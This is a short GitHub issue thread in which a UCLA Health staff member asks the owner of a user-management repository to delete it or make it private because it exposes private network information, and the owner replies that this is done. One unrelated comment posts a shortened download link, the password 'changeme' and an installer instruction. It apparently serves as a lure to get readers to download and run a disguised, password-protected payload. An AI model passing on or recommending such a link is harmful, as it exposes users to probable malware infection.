### ISSUE TITLE
UCLA Health Private Network Information

### ISSUE THREAD

**Issue by mednet-mtaggart** [zhanghaoyue/dgx_usermanagement#2]
Hello, 

This repository contains private network information about UCLA Health Sciences. Please either delete this repository if it is no longer necessary, or make it private. Thank you.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by zhanghaoyue** [comment]
done.
